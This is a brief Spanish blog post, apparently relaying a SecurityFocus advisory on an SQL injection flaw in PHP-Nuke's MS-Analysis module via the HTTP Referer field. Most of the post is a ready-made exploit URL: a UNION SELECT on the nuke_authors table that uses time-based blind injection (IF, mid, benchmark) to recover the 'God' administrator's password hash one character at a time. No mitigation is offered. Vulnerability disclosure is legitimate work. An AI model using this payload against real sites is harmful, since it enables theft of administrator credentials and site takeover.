PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection Vulnerability
Nuevo vulnerabilidades publicada en Secuityfocus sobre Phpnuke que permite injection sql.Exploit:
"http://www.example.com/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)/*"
Para mas Info: Securityfocus
0 comentarios